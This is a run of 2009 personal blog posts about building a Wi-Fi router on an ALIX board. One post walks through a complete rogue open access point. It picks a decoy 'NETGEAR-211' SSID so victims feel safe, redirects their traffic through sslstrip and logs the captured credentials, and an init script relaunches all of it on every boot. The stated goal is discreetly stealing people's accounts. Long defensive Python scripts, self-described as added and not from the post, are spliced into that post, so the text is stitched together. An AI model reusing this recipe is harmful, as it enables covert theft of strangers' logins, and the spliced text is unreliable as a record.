Thursday, July 30, 2009

The stuck beacon nightmare

Everything was going so well that it could not continue. The driver is giving me stuck beacons that reset the AP and make it unusable. RAA

wifi0: ath_bstuck_tasklet: Stuck beacon; resetting (beacon miss count: 11)


This is a well known issue, though. Some people try to tweak the parameters, others have some voodoo techniques that did not work for me. Now I am patching ath5k to support master mode, but it is not really working.

Now, I am trying the wireless-testing branch of the kernel, with the latest drivers available, we'll see...

EDIT: In the end, I tried a bunch of different things to make it work, without success. However, I was able to somewhat decrease the number of stuck beacons by doing the following:
  1. Downloading madwifi from the repository (http://madwifi-project.org/svn)
  2. In ath/if_ath_pci.c, tweaking the PCI latency: pci_write_config_byte(pdev, PCI_LATENCY_TIMER, 0x20);
  3. Doing the voodoo stuff as described here
  4. You can try to switch to ath5k, but master mode was not really successful on my side.

Sunday, July 26, 2009

A very rogue access point: MITM is BACK !

My alix3d3 is becoming little by little a nice Wifi powered router/access point. Previously, we have seen how to make an access point from it. Now, we will see how to make a home router and even more.

For our experiment, I will use an AR5413 based card (ath_pci module). The network infrastructure looks like the following:



Basically, we have the physical interface (wifi0) and on top of that, we create 3 different virtual interfaces:
  1. ath0: an encrypted interface, using for example WPA2.
  2. ath1: an open interface on which everybody will be able to connect. On this one we will perform a "Man-in-the-middle" attack.
  3. ath2: our interface in "managed" mode, which will be the one providing Internet access. It could be an Ethernet interface as well.


Now that we have the network map in mind, we can start working. We will split the work into different steps:
  1. Create the virtual interfaces
  2. create the access points with hostapd
  3. Provide internet
  4. Set the man in the middle
  5. automate this for the next reboot.

The first step is to create the 3 different interfaces:


wlanconfig ath0 destroy; wlanconfig ath0 create wlandev wifi0 wlanmode ap; ifconfig ath0 192.168.100.1 netmask 255.255.255.0
wlanconfig ath1 destroy; wlanconfig ath1 create wlandev wifi0 wlanmode ap; ifconfig ath1 192.168.101.1 netmask 255.255.255.0
wlanconfig ath2 destroy; wlanconfig ath2 create wlandev wifi0 wlanmode managed; ifconfig ath2 up


The output should be something like:

> ifconfig

ath0 Link encap:Ethernet HWaddr 0E:FC:CB:2D:54:1A
inet addr:192.168.100.1 Bcast:192.168.100.255 Mask:255.255.255.0
inet6 addr: fe80::4c0:caff:fe1f:442b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

ath1 Link encap:Ethernet HWaddr 0E:FC:CB:2D:54:1A
inet addr:192.168.101.1 Bcast:192.168.101.255 Mask:255.255.255.0
inet6 addr: fe80::8c0:caff:fe1f:442b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

ath2 Link encap:Ethernet HWaddr 0E:FC:CB:2D:54:1A
inet6 addr: fe80::cc0:caff:fe1f:442b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

> iwconfig

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Master Frequency:2.462 GHz Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/70 Signal level=-83 dBm Noise level=-83 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

ath1 IEEE 802.11g ESSID:"" Nickname:""
Mode:Master Channel:0 Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/70 Signal level=-83 dBm Noise level=-83 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

ath2 IEEE 802.11g ESSID:"" Nickname:""
Mode:Managed Channel:0 Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/70 Signal level=-83 dBm Noise level=-83 dBm
Rx invalid nwid:9 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0


If you set an ESSID for the interface ath0 and ath1, you will be able to connect right away. However, we want to add some security to ath0. For this, we will use hostapd. We will write two different hostapd.conf files, one for each ap (ath0 and ath1).

Here is the configuration for the open access point; apart from the marked lines, I kept the default settings.


interface=ath1 ****
driver=madwifi ****
logger_syslog=1
logger_syslog_level=1
logger_stdout=1
logger_stdout_level=1
dump_file=/tmp/hostapd.dump
ctrl_interface=/var/run/hostapd
ctrl_interface_group=0
ssid=NETGEAR-211 ****
hw_mode=g ****
channel=1 ****
beacon_int=300 ****
dtim_period=2
max_num_sta=5
rts_threshold=2347
fragm_threshold=2346
macaddr_acl=0
auth_algs=3
ignore_broadcast_ssid=0
wme_enabled=1
wme_ac_bk_cwmin=4
wme_ac_bk_cwmax=10
wme_ac_bk_aifs=7
wme_ac_bk_txop_limit=0
wme_ac_bk_acm=0
wme_ac_be_aifs=3
wme_ac_be_cwmin=4
wme_ac_be_cwmax=10
wme_ac_be_txop_limit=0
wme_ac_be_acm=0
wme_ac_vi_aifs=2
wme_ac_vi_cwmin=3
wme_ac_vi_cwmax=4
wme_ac_vi_txop_limit=94
wme_ac_vi_acm=0
wme_ac_vo_aifs=2
wme_ac_vo_cwmin=2
wme_ac_vo_cwmax=3
wme_ac_vo_txop_limit=47
wme_ac_vo_acm=0
eapol_key_index_workaround=0
eap_server=0
own_ip_addr=127.0.0.1

I marked with asterisks (****) the lines where the default parameters must be changed. One might wonder: "why are we setting such an ESSID, "NETGEAR-211"?" The reason is that if you put something like "free_wifi", it might alarm the person who wants to connect (free wifi? Why? Sounds weird), whereas NETGEAR is the default ESSID of Netgear APs. I added "-211" to know that it is mine.

For the other access point, we do almost the same, but this time with WPA enabled:

interface=ath0
driver=madwifi
logger_syslog=-1
logger_syslog_level=2
logger_stdout=-1
logger_stdout_level=2
dump_file=/tmp/hostapd.dump
ctrl_interface=/var/run/hostapd
ctrl_interface_group=0
ssid=blabla *****
hw_mode=g
channel=1
beacon_int=300
dtim_period=2
max_num_sta=255
rts_threshold=2347
fragm_threshold=2346
macaddr_acl=0
auth_algs=3
ignore_broadcast_ssid=0
wme_enabled=1
wme_ac_bk_cwmin=4
wme_ac_bk_cwmax=10
wme_ac_bk_aifs=7
wme_ac_bk_txop_limit=0
wme_ac_bk_acm=0
wme_ac_be_aifs=3
wme_ac_be_cwmin=4
wme_ac_be_cwmax=10
wme_ac_be_txop_limit=0
wme_ac_be_acm=0
wme_ac_vi_aifs=2
wme_ac_vi_cwmin=3
wme_ac_vi_cwmax=4
wme_ac_vi_txop_limit=94
wme_ac_vi_acm=0
wme_ac_vo_aifs=2
wme_ac_vo_cwmin=2
wme_ac_vo_cwmax=3
wme_ac_vo_txop_limit=47
wme_ac_vo_acm=0
eapol_key_index_workaround=0
eap_server=0
own_ip_addr=127.0.0.1
wpa=1
wpa_passphrase=yeahthisisagoodpass ******
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
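Both hostapd.conf files above carry settings that a hardening review would flag: the ath1 one is open by design, and the ath0 one selects wpa=1 with TKIP allowed and auth_algs=3 (which also offers Shared Key authentication). The following Python script is an added example, not part of hostapd or of this post: it parses hostapd's key=value format (accepting the **** markers used above), lists the weak settings, and rewrites the WPA config to WPA2/CCMP only. The directive names are real hostapd options; the checks are the example's own, not hostapd's, and the two embedded sample configs are trimmed copies of the files above.

```python
"""Audit a hostapd.conf for weak settings and emit a hardened copy.

Added example, not part of hostapd or of this post's setup. The directive
names (wpa, wpa_pairwise, rsn_pairwise, auth_algs, wpa_passphrase, ...) are
real hostapd options; the rules and the two sample configs are ours.
"""


def parse_hostapd_conf(text):
    """Parse hostapd's key=value format into a dict.

    hostapd ignores blank lines and lines starting with '#'. The trailing
    '****' markers used in the post are stripped so its files can be fed in.
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        line = line.rstrip("* ").strip()
        key, sep, value = line.partition("=")
        if sep:
            conf[key.strip()] = value.strip()
    return conf


def find_weaknesses(conf):
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    wpa = int(conf.get("wpa") or 0)  # bit field: 1 = WPA1, 2 = WPA2/RSN
    if wpa == 0:
        findings.append("open network (wpa missing or 0): anyone can associate "
                        "and all traffic is readable and redirectable in clear")
    else:
        if wpa & 1:
            findings.append("wpa=%d still offers WPA1; use wpa=2 only" % wpa)
        if not (conf.get("wpa_passphrase") or conf.get("wpa_psk")):
            findings.append("WPA enabled but no wpa_passphrase/wpa_psk set")
        for key in ("wpa_pairwise", "rsn_pairwise"):
            if "TKIP" in conf.get(key, "").split():
                findings.append("%s allows TKIP; set %s=CCMP" % (key, key))
    # auth_algs is a bit field: 1 = Open System, 2 = Shared Key (WEP only)
    if int(conf.get("auth_algs") or 1) & 2:
        findings.append("auth_algs enables Shared Key (WEP) authentication; "
                        "set auth_algs=1")
    return findings


def harden(conf):
    """Return a WPA2/CCMP-only copy of the config.

    No passphrase is invented for an open AP: the operator has to choose one,
    so only configs that already carry a key are switched to WPA2.
    """
    out = dict(conf)
    if out.get("wpa_passphrase") or out.get("wpa_psk"):
        out["wpa"] = "2"
        out["wpa_key_mgmt"] = "WPA-PSK"
        out["wpa_pairwise"] = "CCMP"
        out["rsn_pairwise"] = "CCMP"
    out["auth_algs"] = "1"
    return out


def render(conf):
    """Serialize back to hostapd's key=value format."""
    return "".join("%s=%s\n" % item for item in conf.items())


# Constructed samples: the security-relevant lines of the two configs above.
OPEN_CONF = """\
interface=ath1 ****
driver=madwifi ****
ssid=NETGEAR-211 ****
macaddr_acl=0
auth_algs=3
"""

WPA_CONF = """\
interface=ath0
driver=madwifi
ssid=blabla *****
auth_algs=3
wpa=1
wpa_passphrase=yeahthisisagoodpass ******
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
"""

if __name__ == "__main__":
    for name, text in (("ath1 (open)", OPEN_CONF), ("ath0 (wpa)", WPA_CONF)):
        print("==", name)
        for finding in find_weaknesses(parse_hostapd_conf(text)) or ["no findings"]:
            print("  -", finding)
    print(render(harden(parse_hostapd_conf(WPA_CONF))))
```

Feed it a real file with parse_hostapd_conf(open(path).read()); the hardened output still needs the rest of the original directives (interface, driver, channel) merged back, which render() keeps since harden() only overrides the crypto keys.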

Now we can launch our two instances of hostapd:

hostapd -B /etc/hostapd/hostapd.conf
hostapd -B /etc/hostapd/hostapd_freewifi.conf

You should now be able to connect to each of these APs, using static IP addresses.

To get Internet access, we still have to configure ath2 and forward the packets:

iwconfig ath2 essid voisin key 78:02:15:20:23
dhcpcd ath2
[...]
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o ath2 -j MASQUERADE

Now you should have Internet access when connecting to ath0 or ath1. Good :)

We want our victims to connect to our AP extremely easily, hence we need at least a DHCP server to give them an IP address. For this, I chose "dnsmasq", because it is very easy to configure. At the same time, we will provide a DNS cache to speed up our DNS requests.


# cat /etc/dnsmasq.conf
listen-address=192.168.100.1,192.168.101.1,127.0.0.1
dhcp-range=192.168.100.50,192.168.100.150,255.255.255.0,12h
dhcp-range=192.168.101.50,192.168.101.150,255.255.255.0,12h
log-dhcp

You can see what is happening in /var/log/message when someone makes a DHCP request. Note that we specify no interface here, in order to respond to all the DHCP requests coming in on the different interfaces. Thus, even ath0 will benefit from the DHCP server.

/etc/rc.d/dnsmasq start
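As an added example (not part of this post's setup), here is a small Python monitor for the lines dnsmasq writes with log-dhcp on: it builds the lease table per interface from the DHCPACK entries and flags any client MAC that is not on an allow-list, which is how the operator of such a router notices an unexpected device on either AP. The message layout (DHCPDISCOVER/DHCPOFFER/DHCPREQUEST/DHCPACK with the interface in parentheses) is dnsmasq's; the syslog prefix, MAC addresses, hostnames and the allow-list are constructed.

```python
"""Summarize dnsmasq 'log-dhcp' lines per interface and flag unknown clients.

Added example, not from the post. The DHCP message layout is dnsmasq's own;
the syslog prefix, MACs, hostnames and allow-list below are constructed.
"""
import re

# e.g. "dnsmasq-dhcp[1234]: DHCPACK(ath1) 192.168.101.50 00:16:6f:12:34:56 laptop"
# DHCPDISCOVER carries no IP, DHCPACK may carry a hostname at the end.
LEASE_RE = re.compile(
    r"dnsmasq-dhcp\[\d+\]: (?P<msg>DHCP[A-Z]+)\((?P<iface>\w+)\)"
    r"(?: (?P<ip>\d+\.\d+\.\d+\.\d+))? (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
    r"(?: (?P<host>\S+))?"
)


def parse_dhcp_log(lines):
    """Yield (msg, iface, ip, mac, host) for every DHCP line in `lines`."""
    for line in lines:
        m = LEASE_RE.search(line)
        if m:
            yield (m.group("msg"), m.group("iface"), m.group("ip"),
                   m.group("mac"), m.group("host"))


def active_leases(lines):
    """Return {iface: {mac: (ip, host)}} built from DHCPACK lines only.

    Only an ACK means the client actually holds the address; DISCOVER/OFFER
    noise from clients that never completed the exchange is ignored.
    """
    leases = {}
    for msg, iface, ip, mac, host in parse_dhcp_log(lines):
        if msg == "DHCPACK":
            leases.setdefault(iface, {})[mac] = (ip, host or "")
    return leases


def unknown_clients(leases, allow_list):
    """MACs holding a lease that are not in allow_list, as (iface, mac, ip)."""
    allowed = {m.lower() for m in allow_list}
    return sorted(
        (iface, mac, ip)
        for iface, by_mac in leases.items()
        for mac, (ip, _host) in by_mac.items()
        if mac not in allowed
    )


# Constructed sample lines in the shape dnsmasq writes with 'log-dhcp' on.
SAMPLE_LOG = """\
Jul 26 14:03:11 alix dnsmasq-dhcp[1234]: DHCPDISCOVER(ath1) 00:16:6f:12:34:56
Jul 26 14:03:11 alix dnsmasq-dhcp[1234]: DHCPOFFER(ath1) 192.168.101.50 00:16:6f:12:34:56
Jul 26 14:03:11 alix dnsmasq-dhcp[1234]: DHCPREQUEST(ath1) 192.168.101.50 00:16:6f:12:34:56
Jul 26 14:03:11 alix dnsmasq-dhcp[1234]: DHCPACK(ath1) 192.168.101.50 00:16:6f:12:34:56 laptop
Jul 26 14:05:40 alix dnsmasq-dhcp[1234]: DHCPDISCOVER(ath0) 00:1b:77:aa:bb:cc
Jul 26 14:05:40 alix dnsmasq-dhcp[1234]: DHCPOFFER(ath0) 192.168.100.50 00:1b:77:aa:bb:cc
Jul 26 14:05:40 alix dnsmasq-dhcp[1234]: DHCPREQUEST(ath0) 192.168.100.50 00:1b:77:aa:bb:cc
Jul 26 14:05:40 alix dnsmasq-dhcp[1234]: DHCPACK(ath0) 192.168.100.50 00:1b:77:aa:bb:cc
Jul 26 14:09:02 alix dnsmasq-dhcp[1234]: DHCPDISCOVER(ath1) 00:23:45:de:ad:01
""".splitlines()

KNOWN_MACS = ["00:1b:77:aa:bb:cc"]  # constructed: the household's own laptop

if __name__ == "__main__":
    leases = active_leases(SAMPLE_LOG)
    for iface, by_mac in sorted(leases.items()):
        for mac, (ip, host) in by_mac.items():
            print("%-5s %s %-16s %s" % (iface, mac, ip, host))
    for iface, mac, ip in unknown_clients(leases, KNOWN_MACS):
        print("unknown client on %s: %s holds %s" % (iface, mac, ip))
```

On the router itself, replace SAMPLE_LOG with the lines of the file dnsmasq logs to (the post's /var/log/message); a device that only ever shows DHCPDISCOVER never reaches the lease table, which is the intended behaviour.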


At this point, we have two working APs providing Internet access. Now we want to do some devil stuff: stealing people's accounts in a very discreet fashion. I thought for a while about the best way to do this. A long time ago, I was using ettercap, but for the router it is not a very good choice. Then I was wondering if the dsniff suite could do the job. It does, but I was not really convinced. You know, when you connect to a website requiring an SSL certificate, if you are using ettercap, you will get some huge WARNING all over the place. This is not what I call "discreet".

Anyway, after a few minutes, I found a tool called sslstrip. This tool was presented at Black Hat last year and does a pretty good job. I'll let you read on their website how it works for more info. Making it work is dead easy:

iptables -i ath1 -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -p -f -w ./verycool.txt

Note that iptables is acting on ath1. Now if you connect to the open AP, guess what happens? I was surprised to see how well it works. The drawback is that it slows down the connection a bit.
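From the client side, the tell-tale of this setup is that a page which would normally be served over https now arrives over plain http with its form targets rewritten, so a password field ends up being submitted in clear. The following Python check is an added example, not from the post or from sslstrip: it parses the received HTML, resolves each form action against the page URL the way a browser does, and reports password forms that would post over http. The page URL and HTML snippets are constructed.

```python
"""Client-side check for a stripped-SSL login page (added example).

A page whose links and form targets were rewritten from https:// to http://
carries a detectable symptom: a password field whose form will be submitted
over plain HTTP. The URLs and HTML below are constructed for the example.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormScanner(HTMLParser):
    """Collects every <form> together with whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of [action, has_password]
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = [a.get("action") or "", False]
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def insecure_credential_forms(page_url, html):
    """Return the absolute submit URLs of password forms that post in clear.

    The action is resolved against the page URL as a browser does, so a
    relative action on an http:// page counts as cleartext too.
    """
    scanner = _FormScanner()
    scanner.feed(html)
    scanner.close()
    hits = []
    for action, has_password in scanner.forms:
        if not has_password:
            continue
        target = urljoin(page_url, action)
        if urlsplit(target).scheme != "https":
            hits.append(target)
    return hits


# Constructed: a login page as a client would receive it through the
# rewriting proxy (form target downgraded to http) and the intact original.
STRIPPED_PAGE = """<html><body>
<form action="/search" method="get"><input name="q"></form>
<form action="http://login.example.com/auth" method="post">
  <input name="user"><input type="password" name="pass">
</form>
</body></html>"""

INTACT_PAGE = STRIPPED_PAGE.replace("http://login.example.com/auth",
                                    "https://login.example.com/auth")

if __name__ == "__main__":
    print("received over http:", insecure_credential_forms("http://login.example.com/", STRIPPED_PAGE))
    print("intact over https: ", insecure_credential_forms("https://login.example.com/", INTACT_PAGE))
```

A browser's own "insecure form" warning and HSTS on the server side implement the same idea; for the client, the post's closing advice of a VPN or an end-to-end encrypted connection remains the robust answer.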

Now, we don't want to redo this every time the alix reboots. I modified /etc/rc.d/hostapd into /etc/rc.d/hostapd_mod:

> less /etc/init.d/hostapd_mod
#!/bin/bash

. /etc/rc.conf
. /etc/rc.d/functions

case "$1" in
  start)
    stat_busy "Destroying and creating ath0"
    wlanconfig ath0 destroy; wlanconfig ath0 create wlandev wifi0 wlanmode ap; ifconfig ath0 192.168.100.1 netmask 255.255.255.0
    stat_busy "Destroying and creating ath1"
    wlanconfig ath1 destroy; wlanconfig ath1 create wlandev wifi0 wlanmode ap; ifconfig ath1 192.168.101.1 netmask 255.255.255.0
    stat_busy "Starting hostapd"
    sleep 1
    /usr/bin/hostapd -B -P /var/run/hostapd.pid /etc/hostapd/hostapd.conf &> /dev/null
    /usr/bin/hostapd -B -P /var/run/hostapd.pid2 /etc/hostapd/hostapd_freewifi.conf &> /dev/null
    stat_busy "Starting sslstrip"
    iptables -i ath1 -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    stat_busy "Destroying and creating ath2"
    wlanconfig ath2 destroy; wlanconfig ath2 create wlandev wifi0 wlanmode managed;
    iptables -t nat -A POSTROUTING -o ath2 -j MASQUERADE
    sslstrip -p -f -w /home/root/cool_stuff-`date +"%H-%M-%m-%d"`.txt &
    if [ $? -gt 0 ]; then
      stat_fail
    else
      stat_done
      add_daemon hostapd
    fi
    ;;
  stop)
    stat_busy "Stopping hostapd"
    [ -f /var/run/hostapd.pid ] && kill `cat /var/run/hostapd.pid` && kill `cat /var/run/hostapd.pid2` && killall sslstrip &> /dev/null
    if [ $? -gt 0 ]; then
      stat_fail
    else
      stat_done
      rm_daemon hostapd
    fi
    ;;
  restart)
    $0 stop
    sleep 1
    $0 start
    ;;
  *)
    echo "usage: $0 {start|stop|restart}"
esac

This is probably not the cleanest way to do it, but it works pretty well. However, this script does not connect ath2 to the upstream AP (I do that manually for now).

/etc/rc.conf has the following:


DAEMONS=(network sshd crond dnsmasq hostapd_mod)

lo="lo 127.0.0.1"
eth0="eth0 192.168.2.3 netmask 255.255.255.0 up"
ath0="ath0 192.168.100.1 netmask 255.255.255.0 up"
ath1="ath1 192.168.101.1 netmask 255.255.255.0 up"
ath2="ath2 up"
INTERFACES=(eth0 ath0 ath1 ath2)


Obviously, an easy way to circumvent this MITM is to use a VPN, for example, or an encrypted connection.

Thursday, July 23, 2009

Hex to dec to bin conversion

There exists a plethora of ways to convert numbers. Some use bc, others use the shell, but there is a small program that does the trick pretty well: pcalc.

Look at the output:


> pcalc 3124
3124 0xc34 0y110000110100
> pcalc 0x5349-99
21222 0x52e6 0y101001011100110


Simple and effective, that's it.

Tuesday, July 21, 2009

alix3d3: issue when booting up

The router is almost OK; now I am trying to boot the board. However, when no screen is attached, it hangs at boot time, after displaying an error message mentioning "edd". I tried to disable it, but it didn't help. I've no clue yet, but I'm investigating. Since I don't have any screen here, it makes things more difficult :P...


EDIT: some guy (Chris) proposed a genius idea:

Get a paperclip and carefully insert into the VGA header plug, shorting pin 6 to pin 12 (middle row far right to bottom row 2nd from the right). Whenever you don't have a monitor attached leave the paperclip in. Your Alix 3c3 will now boot up without a monitor attached.


So thanks to him :).

According to Wikipedia, Pin 6 = Red return and Pin 12 = PC Data, so it makes sense to bridge them.

Apparently, CONFIG_FIRMWARE_EDID=n should fix it, too.

Saturday, July 18, 2009

IP forwarding for the dummies

How many times have I been configuring a box without access to the Internet!
Here is a simple and effective way to turn your laptop into an IP forwarder.

Suppose that you are configuring the alix3d3 and you don't have access to the Internet, but your laptop does. We connect a cable between the alix3d3 and the laptop. Here is what to do:

-> On your laptop:


ifconfig eth0 192.168.2.2 # set a static ip address to eth0
echo 1 > /proc/sys/net/ipv4/ip_forward # set forwarding
iptables -t nat -A POSTROUTING -o ${IFACE_NET} -j MASQUERADE


Note that ${IFACE_NET} is the interface from where you get your internet access. Usually, if it is by wifi, it is ath0 or wlan0.

-> On the other box:

ifconfig eth0 192.168.2.3
route add -net default gw 192.168.2.2

Make sure your /etc/resolv.conf is not empty. You can still use a public dns server.

That's all: your box now gets Internet access through the laptop.

alix3d3: towards an access point

Now that we have a running operating system (Arch linux in this case), the next step is to configure my box as an access point, to act like my old dd-wrt router.

There are already good topics on the subject, like here or here.

To test my network, I am using 3 computers (you can do it with VMs though):
  1. A laptop: it will be my "client".
  2. A desktop computer: it will act as my ISP.
  3. Alix3d3: it will act as my wireless access point (WAP).
As you can see in the picture, the client connects to the WAP over the air (hence the name :P) and the AP connects to the server with a wire. The server runs a simple DHCP server.

To have this configuration, here is what we need to do:

On the server, we need to install the dhcp server. I decided to use dnsmasq, because it is very easy to configure and fits well for my small network.

To do so, on the server, simply add the following lines to your /etc/dnsmasq.conf. Note that it is not mandatory to explicitly write the interface, but I find it cleaner. log-dhcp will log helpful information about what is going on to /var/log/message (just do a 'tail -f' on it).

dhcp-range=192.168.2.50,192.168.2.150,3d
interface=eth0
log-dhcp

Once you have set it up, start the dnsmasq service, usually by doing something like:

ifconfig eth0 192.168.2.1
/etc/init.d/dnsmasq start

You can test that everything is working properly by connecting the alix3d3 board to the server and running:

dhcpcd eth0

Now that we have a DHCP server available, we need to configure the access point. To make it simple, I decided to configure the simplest access point, i.e. without any encryption (for now).

The wireless card uses the madwifi driver. As you may know, madwifi does not work exactly like the other drivers, since it uses its own wlanconfig tool.
Basically, since we want to set our card as an access point, we have to do:

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode ap

Now your card is in master mode; you can verify it with iwconfig.

To me, an access point only offers the "wire". In a sense, it is like when 2 people do not speak the same language and a person comes in the middle speaking both languages: the first person speaks to the person in the middle, who translates it for the second person.

In our case, a bridge will do the job: all the data coming in over the air will be passed to the wire and vice-versa. Making one is not a big deal; the man page of brctl describes it pretty well.


brctl addbr br0 # creates the bridge
brctl addif br0 eth0 # adds eth0 to the bridge
brctl addif br0 ath0 # adds ath0 to the bridge
brctl show # shows what we did
bridge name     bridge id               STP enabled     interfaces
br0             8000.000db917b374       no              ath0
                                                        eth0
To set up the access point, we will use hostapd, the IEEE 802.11 wireless LAN Host AP daemon.

To make it simple, here is my configuration for /etc/hostapd/hostapd.conf. I did not change the default values; I just set the ssid to pliplop, the interface to ath0 and the bridge to br0.


interface=ath0
bridge=br0
driver=madwifi
logger_syslog=-1
logger_syslog_level=2
logger_stdout=-1
logger_stdout_level=2
dump_file=/tmp/hostapd.dump
ctrl_interface=/var/run/hostapd
ctrl_interface_group=0
ssid=pliplop
hw_mode=g
channel=1
beacon_int=100
dtim_period=2
max_num_sta=255
rts_threshold=2347
fragm_threshold=2346
macaddr_acl=0
auth_algs=3
ignore_broadcast_ssid=0
wme_enabled=1
wme_ac_bk_cwmin=4
wme_ac_bk_cwmax=10
wme_ac_bk_aifs=7
wme_ac_bk_txop_limit=0
wme_ac_bk_acm=0
wme_ac_be_aifs=3
wme_ac_be_cwmin=4
wme_ac_be_cwmax=10
wme_ac_be_txop_limit=0
wme_ac_be_acm=0
wme_ac_vi_aifs=2
wme_ac_vi_cwmin=3
wme_ac_vi_cwmax=4
wme_ac_vi_txop_limit=94
wme_ac_vi_acm=0
wme_ac_vo_aifs=2
wme_ac_vo_cwmin=2
wme_ac_vo_cwmax=3
wme_ac_vo_txop_limit=47
wme_ac_vo_acm=0
eapol_key_index_workaround=0
eap_server=0
own_ip_addr=127.0.0.1


We are ready to launch the hostap daemon...

Everything seems to be working now. Let's try to connect with the client.


iwconfig wlan0 essid pliplop
dhcpcd wlan0
wlan0: dhcpcd 4.0.13 starting
wlan0: broadcasting for a lease
wlan0: offered 192.168.0.82 from 192.168.0.1
wlan0: ignoring offer of 192.168.2.82 from 192.168.2.1
wlan0: acknowledged 192.168.0.82 from 192.168.0.1
wlan0: checking 192.168.0.82 is available on attached networks
wlan0: leased 192.168.0.82 for 259200 seconds


ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:15:6d:53:01:d2
inet addr:192.168.2.82 Bcast:192.168.2.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4235 errors:0 dropped:0 overruns:0 frame:0
TX packets:4179 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2448884 (2.3 MiB) TX bytes:372396 (363.6 KiB)


As you can see, we received the IP address 192.168.2.82, which is in the pool of IP addresses we set up before on the server. We see that the access point acts transparently, as if we had pulled a direct wire between the client and the server. It is also worth noticing that on the alix3d3, we did not give any IP address to either the eth0 or the ath0 interface. This makes sense, since IP addresses are one layer above the one we are working at.

Finally, if you want to configure your alix3d3 further, you can for example run dhcpcd br0 on the WAP: the server will offer it an IP address and you'll be able to access it.

This is not too bad for the moment, but I want my alix3d3 to act not only as an access point but also as a router, so that I can add more advanced features. The next step is thus to configure a router on top of that.

Saturday, July 4, 2009

Alix3d3: first impression + OS installation




I finally got my alix3d3 board, from pcengines that will replace my router. I also bought a 4GB compact flash and a Wifi mini-pci card (WLM54GP23), with an atheros chipset. The box has a VGA output, but also audio in/out, but I don't really care about that. It also has a RJ45 connector, 2 USBs and a Serial connection, this is interesting !


The first thing to do is to choose the operating system that will run on it. We have 256MB of RAM and an AMD Geode running at a clock speed of 500MHz. I want a VERY lightweight operating system, with a minimal set of packages. Moreover, I don't wanna compile anything on it: it's gonna be too slow, and it will wear out the CF card. So first, I tried "Slitaz", which is a Swiss linux distribution known to be extremely light. This distribution comes with a 2.6.25 kernel, and you have a neat system of binary packages. That sounded good, until I started to hack around. Actually, as soon as you want to upgrade the kernel, you must do it yourself, and it seems that the community is not really reactive (packages are old, etc). I just want something light that I "run and install", without having to hack too much like on my gentoo.

I decided to give up on Slitaz and move to archlinux, which is based on gentoo and which I always wanted to try. I downloaded the iso file from their FTP and ran it in VMWare. I attached my card reader to the VM and from there I was able to install my system within half an hour. I am used to doing purely manual installations, from partitioning to kernel configuration and selecting my packages one by one, but here you have a nice UI (dialog) asking what you wanna do. I selected "auto partitioning", and it did the job for me. First impression is pretty good!

Next, it asked me which packages I wanted to install. Again, it has a small list (sounds like a BSD install), and you just select the packages you want installed, including the kernel. It downloads the latest release of each package directly (provided you chose the FTP/HTTP installation method) and installs them without any human intervention; that was exactly what I was looking for.

However, when you let the software do what it wants, you may end up with some undesired behaviors. I had some issues with GRUB: it was configured in a very weird way, so I had to modify it manually. Then I got issues when booting the kernel; actually the image was kind of corrupted. Fortunately, there is a "fallback" mode you can choose to help debugging. I also found mkinitcpio (which creates an initial ramdisk environment) very helpful here in fixing the different issues I had.

Another problem is that you have tons of modules loaded at boot time. My wireless cards were recognized, but I was not able to set them in Master Mode (access point). Actually, it was due to the ath5k module not supporting Master Mode. Fortunately, the ath_pci module from madwifi-ng works just great and lets you set the interface in Master mode. I just added MODULES=("!ath5k ath_pci ath_hal") to the /etc/rc.conf file in order to ignore the ath5k module and load the ath_pci one.

